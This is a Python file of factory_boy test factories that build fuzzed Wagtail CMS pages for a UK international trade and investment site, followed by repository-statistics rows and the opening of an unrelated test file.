    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
class InternationalArticlePageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalArticlePage (fixed 'Blog' article type)."""
    class Meta:
        model = models.great_international.InternationalArticlePage

    type_of_article = 'Blog'
    article_title = factory.fuzzy.FuzzyText(length=10)
    article_subheading = factory.fuzzy.FuzzyText(length=10)
    article_teaser = factory.fuzzy.FuzzyText(length=10)
    article_image = factory.SubFactory(wagtail_factories.ImageFactory)
    article_body_text = factory.fuzzy.FuzzyText(length=10)
    cta_title = factory.fuzzy.FuzzyText(length=10)
    cta_teaser = factory.fuzzy.FuzzyText(length=10)
    cta_link_label = factory.fuzzy.FuzzyText(length=10)
    cta_link = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
class InternationalCampaignPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalCampaignPage with fuzzed content fields."""
    class Meta:
        model = models.great_international.InternationalCampaignPage

    campaign_teaser = factory.fuzzy.FuzzyText(length=10)
    campaign_heading = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
    section_one_heading = factory.fuzzy.FuzzyText(length=10)
    section_one_intro = factory.fuzzy.FuzzyText(length=10)
    selling_point_one_heading = factory.fuzzy.FuzzyText(length=10)
    selling_point_one_content = factory.fuzzy.FuzzyText(length=10)
    section_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_intro = factory.fuzzy.FuzzyText(length=10)
    related_content_heading = factory.fuzzy.FuzzyText(length=10)
    related_content_intro = factory.fuzzy.FuzzyText(length=10)
    cta_box_message = factory.fuzzy.FuzzyText(length=10)
    cta_box_button_url = factory.fuzzy.FuzzyText(length=10)
    cta_box_button_text = factory.fuzzy.FuzzyText(length=10)
class InternationalTopicLandingPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalTopicLandingPage."""
    class Meta:
        model = models.great_international.InternationalTopicLandingPage

    landing_page_title = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    parent = None
class fuzzyURL(factory.fuzzy.BaseFuzzyAttribute):
    """Fuzzy attribute producing a random URL of the form
    ``<protocol>://<random-lowercase-name>.<tld>``."""

    def __init__(self, protocol='https', tld='co.uk', name_length=15):
        super().__init__()
        self.protocol = protocol
        self.tld = tld
        self.name_length = name_length

    def fuzz(self):
        # Draw `name_length` random lowercase letters for the host name.
        host = ''.join(
            random.choice(string.ascii_lowercase)
            for _ in range(self.name_length)
        )
        return self.protocol + '://' + host + '.' + self.tld
class InternationalGuideLandingPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalGuideLandingPage."""
    class Meta:
        model = models.great_international.InternationalGuideLandingPage

    display_title = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: unlike most factories here, title_en_gb is fuzzed, not a Sequence.
    title_en_gb = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    teaser = factory.fuzzy.FuzzyText(length=10)
    section_one_content = factory.fuzzy.FuzzyText(length=10)
    section_one_image = factory.SubFactory(wagtail_factories.ImageFactory)
    section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
    section_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_teaser = factory.fuzzy.FuzzyText(length=10)
    section_two_button_text = factory.fuzzy.FuzzyText(length=10)
    section_two_button_url = factory.fuzzy.FuzzyText(length=10)
    section_two_image = factory.SubFactory(wagtail_factories.ImageFactory)
    guides_section_heading = factory.fuzzy.FuzzyText(length=10)
    parent = None
class InternationalCapitalInvestLandingPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalCapitalInvestLandingPage."""
    class Meta:
        model = models.capital_invest.InternationalCapitalInvestLandingPage

    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
class CapitalInvestRegionPageFactory(wagtail_factories.PageFactory):
    """Test factory for CapitalInvestRegionPage."""
    class Meta:
        model = models.capital_invest.CapitalInvestRegionPage

    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    featured_description = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
class CapitalInvestOpportunityPageFactory(wagtail_factories.PageFactory):
    """Test factory for CapitalInvestOpportunityPage."""
    class Meta:
        model = models.capital_invest.CapitalInvestOpportunityPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    project_background_title = factory.fuzzy.FuzzyText(length=10)
    project_background_intro = factory.fuzzy.FuzzyText(length=10)
    location = factory.fuzzy.FuzzyText(length=10)
    scale = factory.fuzzy.FuzzyText(length=10)
    investment_type = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    parent = None
class CapitalInvestRelatedSectorsFactory(factory.django.DjangoModelFactory):
    """Test factory for the CapitalInvestRelatedSectors through-model;
    callers must supply page and related_sector explicitly."""
    class Meta:
        model = models.capital_invest.CapitalInvestRelatedSectors

    page = None
    related_sector = None
class CapitalInvestOpportunityListingPageFactory(wagtail_factories.PageFactory):
    """Test factory for CapitalInvestOpportunityListingPage."""
    class Meta:
        model = models.capital_invest.CapitalInvestOpportunityListingPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    search_results_title = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    parent = None
class InvestInternationalHomePageFactory(wagtail_factories.PageFactory):
    """Test factory for InvestInternationalHomePage (fixed 'invest-home' slug)."""
    class Meta:
        model = models.invest.InvestInternationalHomePage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    heading_en_gb = factory.fuzzy.FuzzyText(length=100)
    sub_heading = factory.fuzzy.FuzzyText(length=100)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    benefits_section_title = factory.fuzzy.FuzzyText(length=10)
    sector_title = factory.fuzzy.FuzzyText(length=10)
    sector_button_text = factory.fuzzy.FuzzyText(length=10)
    sector_button_url = factory.fuzzy.FuzzyText(length=10)
    hpo_title = factory.fuzzy.FuzzyText(length=10)
    how_we_help_text_one_en_gb = factory.fuzzy.FuzzyText(length=10)
    how_we_help_text_two_en_gb = factory.fuzzy.FuzzyText(length=10)
    how_we_help_text_three_en_gb = factory.fuzzy.FuzzyText(length=10)
    how_we_help_text_four_en_gb = factory.fuzzy.FuzzyText(length=10)
    how_we_help_text_five_en_gb = factory.fuzzy.FuzzyText(length=10)
    contact_section_title = factory.fuzzy.FuzzyText(length=10)
    contact_section_call_to_action_text = factory.fuzzy.FuzzyText(length=10)
    contact_section_call_to_action_url = factory.fuzzy.FuzzyText(length=10)
    # Fixed slug (not a Sequence): only one invest home page is expected.
    slug = 'invest-home'
    parent = None
class InvestHighPotentialOpportunitiesPageFactory(wagtail_factories.PageFactory):
    """Test factory for InvestHighPotentialOpportunitiesPage (no extra fields)."""
    class Meta:
        model = models.invest.InvestHighPotentialOpportunitiesPage

    parent = None
class ForeignDirectInvestmentFormPageFactory(wagtail_factories.PageFactory):
    """Test factory for ForeignDirectInvestmentFormPage; every form label and
    help text is fuzzed at length 200."""
    class Meta:
        model = models.investment_atlas.ForeignDirectInvestmentFormPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    heading = factory.fuzzy.FuzzyText(length=200)
    sub_heading = factory.fuzzy.FuzzyText(length=200)
    comment_help_text = factory.fuzzy.FuzzyText(length=200)
    comment_label = factory.fuzzy.FuzzyText(length=200)
    company_name_help_text = factory.fuzzy.FuzzyText(length=200)
    company_name_label = factory.fuzzy.FuzzyText(length=200)
    company_size_help_text = factory.fuzzy.FuzzyText(length=200)
    company_size_label = factory.fuzzy.FuzzyText(length=200)
    country_help_text = factory.fuzzy.FuzzyText(length=200)
    country_label = factory.fuzzy.FuzzyText(length=200)
    email_address_help_text = factory.fuzzy.FuzzyText(length=200)
    email_address_label = factory.fuzzy.FuzzyText(length=200)
    full_name_help_text = factory.fuzzy.FuzzyText(length=200)
    full_name_label = factory.fuzzy.FuzzyText(length=200)
    opportunities_help_text = factory.fuzzy.FuzzyText(length=200)
    opportunities_label = factory.fuzzy.FuzzyText(length=200)
    phone_number_help_text = factory.fuzzy.FuzzyText(length=200)
    phone_number_label = factory.fuzzy.FuzzyText(length=200)
    role_in_company_help_text = factory.fuzzy.FuzzyText(length=200)
    role_in_company_label = factory.fuzzy.FuzzyText(length=200)
    website_url_help_text = factory.fuzzy.FuzzyText(length=200)
    website_url_label = factory.fuzzy.FuzzyText(length=200)
    parent = None
class ForeignDirectInvestmentFormSuccessPageFactory(wagtail_factories.PageFactory):
    """Test factory for ForeignDirectInvestmentFormSuccessPage."""
    class Meta:
        model = models.investment_atlas.ForeignDirectInvestmentFormSuccessPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    heading = factory.fuzzy.FuzzyText(length=200)
    sub_heading = factory.fuzzy.FuzzyText(length=200)
    next_steps_title = factory.fuzzy.FuzzyText(length=200)
    next_steps_body = factory.fuzzy.FuzzyText(length=200)
    documents_title = factory.fuzzy.FuzzyText(length=200)
    documents_body = factory.fuzzy.FuzzyText(length=200)
    parent = None
class InvestHighPotentialOpportunityDetailPageFactory(wagtail_factories.PageFactory):
    """Test factory for InvestHighPotentialOpportunityDetailPage; text fields
    are fuzzed at length 50, image fields use the wagtail ImageFactory."""
    class Meta:
        model = models.invest.InvestHighPotentialOpportunityDetailPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
    heading = factory.fuzzy.FuzzyText(length=50)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    contact_proposition = factory.fuzzy.FuzzyText(length=50)
    contact_button = factory.fuzzy.FuzzyText(length=50)
    proposition_one = factory.fuzzy.FuzzyText(length=50)
    opportunity_list_title = factory.fuzzy.FuzzyText(length=50)
    opportunity_list_item_one = factory.fuzzy.FuzzyText(length=50)
    opportunity_list_item_two = factory.fuzzy.FuzzyText(length=50)
    opportunity_list_item_three = factory.fuzzy.FuzzyText(length=50)
    opportunity_list_image = factory.SubFactory(wagtail_factories.ImageFactory)
    proposition_two = factory.fuzzy.FuzzyText(length=50)
    proposition_two_list_item_one = factory.fuzzy.FuzzyText(length=50)
    proposition_two_list_item_two = factory.fuzzy.FuzzyText(length=50)
    proposition_two_list_item_three = factory.fuzzy.FuzzyText(length=50)
    proposition_two_image = factory.SubFactory(wagtail_factories.ImageFactory)
    competitive_advantages_title = factory.fuzzy.FuzzyText(length=50)
    competitive_advantages_list_item_one = factory.fuzzy.FuzzyText(length=50)
    competitive_advantages_list_item_one_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    competitive_advantages_list_item_two = factory.fuzzy.FuzzyText(length=50)
    competitive_advantages_list_item_two_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    competitive_advantages_list_item_three = factory.fuzzy.FuzzyText(length=50)
    competitive_advantages_list_item_three_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    testimonial = factory.fuzzy.FuzzyText(length=50)
    companies_list_text = factory.fuzzy.FuzzyText(length=50)
    companies_list_item_image_one = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_two = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_three = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_four = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_five = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_six = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_seven = factory.SubFactory(wagtail_factories.ImageFactory)
    companies_list_item_image_eight = factory.SubFactory(wagtail_factories.ImageFactory)
    case_study_list_title = factory.fuzzy.FuzzyText(length=50)
    case_study_one_text = factory.fuzzy.FuzzyText(length=50)
    case_study_one_image = factory.SubFactory(wagtail_factories.ImageFactory)
    case_study_two_text = factory.fuzzy.FuzzyText(length=50)
    case_study_two_image = factory.SubFactory(wagtail_factories.ImageFactory)
    case_study_three_text = factory.fuzzy.FuzzyText(length=50)
    case_study_three_image = factory.SubFactory(wagtail_factories.ImageFactory)
    case_study_four_text = factory.fuzzy.FuzzyText(length=50)
    case_study_four_image = factory.SubFactory(wagtail_factories.ImageFactory)
    other_opportunities_title = factory.fuzzy.FuzzyText(length=50)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    parent = None
class InvestRegionPageFactory(wagtail_factories.PageFactory):
    """Test factory for InvestRegionPage."""
    class Meta:
        model = models.invest.InvestRegionPage

    description_en_gb = factory.fuzzy.FuzzyText(length=100)
    heading_en_gb = factory.fuzzy.FuzzyText(length=100)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    pullout_text_en_gb = factory.fuzzy.FuzzyText(length=10)
    pullout_stat_en_gb = factory.fuzzy.FuzzyText(length=10)
    pullout_stat_text_en_gb = factory.fuzzy.FuzzyText(length=10)
    subsection_title_one_en_gb = factory.fuzzy.FuzzyText(length=10)
    subsection_content_one_en_gb = factory.fuzzy.FuzzyText(length=10)
    subsection_title_two_en_gb = factory.fuzzy.FuzzyText(length=10)
    subsection_content_two_en_gb = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    parent = None
class InvestRegionLandingPageFactory(wagtail_factories.PageFactory):
    """Build ``InvestRegionLandingPage`` instances: fuzzy heading plus a hero image."""

    class Meta:
        model = models.invest.InvestRegionLandingPage

    heading_en_gb = factory.fuzzy.FuzzyText(length=100)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
class InternationalTradeHomePageFactory(wagtail_factories.PageFactory):
    """Build ``InternationalTradeHomePage`` (find-a-supplier home) test instances."""

    class Meta:
        model = models.find_a_supplier.InternationalTradeHomePage

    hero_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
    search_field_placeholder_en_gb = factory.fuzzy.FuzzyText(length=255)
    search_button_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    proposition_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    call_to_action_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    industries_list_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    industries_list_call_to_action_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_list_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_column_one_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_column_two_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_column_three_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_column_four_en_gb = factory.fuzzy.FuzzyText(length=255)
    services_column_one_icon_en_gb = factory.SubFactory(wagtail_factories.ImageFactory)
    services_column_two_icon_en_gb = factory.SubFactory(wagtail_factories.ImageFactory)
    services_column_three_icon_en_gb = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    services_column_four_icon_en_gb = factory.SubFactory(wagtail_factories.ImageFactory)
    search_description_en_gb = factory.fuzzy.FuzzyText(length=255)
    # Unique per instance: "123-555-0", "123-555-1", ...
    slug = factory.Sequence('123-555-{0}'.format)
    title_en_gb = factory.Sequence('123-555-{0}'.format)
    parent = None  # no parent page by default; tests supply one when needed
class InternationalTradeIndustryContactPageFactory(wagtail_factories.PageFactory):
    """Build ``InternationalTradeIndustryContactPage`` instances with fuzzy form copy."""

    class Meta:
        model = models.find_a_supplier.InternationalTradeIndustryContactPage

    breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
    introduction_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    submit_button_text_en_gb = factory.fuzzy.FuzzyText(length=100)
    success_message_text_en_gb = factory.fuzzy.FuzzyText(length=255)
    success_back_link_text_en_gb = factory.fuzzy.FuzzyText(length=100)
    # Unique per instance: "123-555-0", "123-555-1", ...
    slug = factory.Sequence('123-555-{0}'.format)
    parent = None  # no parent page by default; tests supply one when needed
class AboutDitServicesPageFactory(
    wagtail_factories.PageFactory
):
    """Factory for ``AboutDitServicesPage`` test instances with fuzzy content."""

    class Meta:
        model = models.great_international.AboutDitServicesPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
    breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class AboutUkLandingPageFactory(
    wagtail_factories.PageFactory
):
    """Factory for ``AboutUkLandingPage`` test instances with fuzzy content."""

    class Meta:
        model = models.great_international.AboutUkLandingPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
    breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class AboutUkRegionListingPageFactory(wagtail_factories.PageFactory):
    """Factory for ``AboutUkRegionListingPage`` test instances with fuzzy content."""

    class Meta:
        model = models.great_international.AboutUkRegionListingPage

    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class AboutUkRegionPageFactory(wagtail_factories.PageFactory):
    """Factory for ``AboutUkRegionPage`` test instances with fuzzy content."""

    class Meta:
        model = models.great_international.AboutUkRegionPage

    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    featured_description = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class AboutUkWhyChooseTheUkPageFactory(
    wagtail_factories.PageFactory
):
    """Factory for ``AboutUkWhyChooseTheUkPage`` test instances with fuzzy content."""

    class Meta:
        model = models.great_international.AboutUkWhyChooseTheUkPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=50)
    breadcrumbs_label_en_gb = factory.fuzzy.FuzzyText(length=50)
    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class CapitalInvestContactFormPageFactory(
    wagtail_factories.PageFactory
):
    """Factory for ``CapitalInvestContactFormPage`` test instances."""

    class Meta:
        model = models.capital_invest.CapitalInvestContactFormPage

    heading = factory.fuzzy.FuzzyText(length=50)
    intro = factory.fuzzy.FuzzyText(length=50)
    cta_text = factory.fuzzy.FuzzyText(length=50)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class CapitalInvestContactFormSuccessPageFactory(
    wagtail_factories.PageFactory
):
    """Factory for ``CapitalInvestContactFormSuccessPage`` test instances."""

    class Meta:
        model = models.capital_invest.CapitalInvestContactFormSuccessPage

    message_box_heading = factory.fuzzy.FuzzyText(length=50)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
class PlanningStatusFactory(factory.django.DjangoModelFactory):
    """Factory for ``PlanningStatus`` records with fuzzy name/description."""

    class Meta:
        model = models.investment_atlas.PlanningStatus

    name = factory.fuzzy.FuzzyText(length=30)
    verbose_description = factory.fuzzy.FuzzyText(length=200)
class InvestmentTypeFactory(factory.django.DjangoModelFactory):
    """Factory for ``InvestmentType`` records with a fuzzy name."""

    class Meta:
        model = models.investment_atlas.InvestmentType

    name = factory.fuzzy.FuzzyText(length=30)
class InvestmentOpportunityPageFactory(wagtail_factories.PageFactory):
    """Build ``InvestmentOpportunityPage`` instances with fuzzy placeholder data.

    StreamFields (``main_content`` and ``regions_with_location``, which holds
    regions and map coordinates) are not set here — assign them on the
    instance in the test.
    """

    class Meta:
        model = models.investment_atlas.InvestmentOpportunityPage

    # Unique per instance: "123-555-0", "123-555-1", ...
    slug = factory.Sequence('123-555-{0}'.format)
    title_en_gb = factory.Sequence('123-555-{0}'.format)
    parent = None  # no parent page by default; tests supply one when needed
    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    priority_weighting = '0.0'
    strapline = factory.fuzzy.FuzzyText(length=200)
    introduction = factory.fuzzy.FuzzyText(length=300)
    opportunity_summary = factory.fuzzy.FuzzyText(length=300)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    intro_image = factory.SubFactory(wagtail_factories.ImageFactory)
    location = factory.fuzzy.FuzzyText(length=200)
    promoter = factory.fuzzy.FuzzyText(length=200)
    scale = factory.fuzzy.FuzzyText(length=255)
    scale_value = factory.fuzzy.FuzzyDecimal(low=1, high=99999)
    planning_status = factory.SubFactory(PlanningStatusFactory)
    investment_type = factory.SubFactory(InvestmentTypeFactory)
    time_to_investment_decision = (
        models.investment_atlas.TIME_TO_INVESTMENT_DECISION_0M_6M
    )
class InvestmentOpportunityRelatedSectorsFactory(factory.django.DjangoModelFactory):
    """Factory for ``InvestmentOpportunityRelatedSectors`` records.

    Both relations default to ``None`` — presumably the link between an
    opportunity page and a sector page (confirm against the model); tests
    must pass ``page`` and ``related_sector`` explicitly.
    """

    class Meta:
        model = models.investment_atlas.InvestmentOpportunityRelatedSectors

    page = None
    related_sector = None
class InvestmentOpportunityListingPageFactory(wagtail_factories.PageFactory):
    """Build ``InvestmentOpportunityListingPage`` instances with fuzzy content."""

    class Meta:
        model = models.investment_atlas.InvestmentOpportunityListingPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    search_results_title = factory.fuzzy.FuzzyText(length=10)
    # Unique per instance: "123-555-0", "123-555-1", ...
    slug = factory.Sequence('123-555-{0}'.format)
    title_en_gb = factory.Sequence('123-555-{0}'.format)
    hero_text = factory.fuzzy.FuzzyText(length=50)
    contact_cta_title = factory.fuzzy.FuzzyText(length=50)
    contact_cta_text = factory.fuzzy.FuzzyText(length=50)
    contact_cta_link = 'https://example.com/test/cta/'
    parent = None  # no parent page by default; tests supply one when needed
class InvestmentAtlasLandingPageFactory(wagtail_factories.PageFactory):
    """Build ``InvestmentAtlasLandingPage`` instances with fuzzy hero content."""

    class Meta:
        model = models.investment_atlas.InvestmentAtlasLandingPage

    breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
    # Unique per instance: "123-555-0", "123-555-1", ...
    slug = factory.Sequence('123-555-{0}'.format)
    title_en_gb = factory.Sequence('123-555-{0}'.format)
    hero_title = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    parent = None  # no parent page by default; tests supply one when needed
class ReusableContentSectionFactory(factory.django.DjangoModelFactory):
    """Factory for ``ReusableContentSection``; ``content`` is deliberately unset."""

    class Meta:
        model = models.investment_atlas.ReusableContentSection

    title = factory.fuzzy.FuzzyText(length=10)
    block_slug = factory.fuzzy.FuzzyText(length=10)
    # content is a StreamField, so easier to set in the test
class InternationalInvestmentSectorPageFactory(wagtail_factories.PageFactory):
    """Factory for ``InternationalInvestmentSectorPage`` test instances."""

    class Meta:
        model = models.great_international.InternationalInvestmentSectorPage

    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
    hero_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    intro_image = factory.SubFactory(
        wagtail_factories.ImageFactory
    )
    heading = factory.fuzzy.FuzzyText(length=10)
class InternationalInvestmentSubSectorPageFactory(wagtail_factories.PageFactory):
    """Factory for ``InternationalInvestmentSubSectorPage`` test instances."""

    class Meta:
        model = models.great_international.InternationalInvestmentSubSectorPage

    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # LazyFunction defers evaluation to build time; a bare ``timezone.now()``
    # here would be evaluated once at import and shared by every instance.
    last_published_at = factory.LazyFunction(timezone.now)
    parent = None  # no parent page by default; tests supply one when needed
    heading = factory.fuzzy.FuzzyText(length=10)
| 38.763039
| 91
| 0.759689
| 4,062
| 34,189
| 6.148449
| 0.074348
| 0.132132
| 0.228709
| 0.294054
| 0.847367
| 0.832633
| 0.784104
| 0.705866
| 0.621982
| 0.498939
| 0
| 0.035001
| 0.147621
| 34,189
| 881
| 92
| 38.807037
| 0.822009
| 0.006757
| 0
| 0.549784
| 0
| 0
| 0.018968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002886
| false
| 0
| 0.010101
| 0
| 0.760462
| 0.017316
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
afe79ebd3db69c28a2acaa8fc86ff8b01225e595
| 1,152
|
py
|
Python
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 23
|
2020-05-25T00:20:32.000Z
|
2022-01-18T10:32:09.000Z
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 15
|
2020-06-15T16:34:22.000Z
|
2021-08-15T22:11:37.000Z
|
tests/lib/cli_tools/test_utilities.py
|
yukgu/covid-model-seiir-pipeline
|
3433034d3f089938e7993b6321d570365bdf62db
|
[
"BSD-3-Clause"
] | 11
|
2020-05-24T21:57:29.000Z
|
2021-09-07T18:21:15.000Z
|
from pathlib import Path
from covid_shared import paths
from covid_model_seiir_pipeline.lib.cli_tools.utilities import (
get_input_root
)
def test_get_input_root():
    """``get_input_root`` prefers the CLI argument over the config value over
    the default's "best" link, and returns absolute paths unchanged."""
    default = paths.SEIR_FINAL_OUTPUTS

    # (cli_arg, config_arg, expected_resolved_path)
    cases = [
        (None, None, (default / paths.BEST_LINK).resolve()),
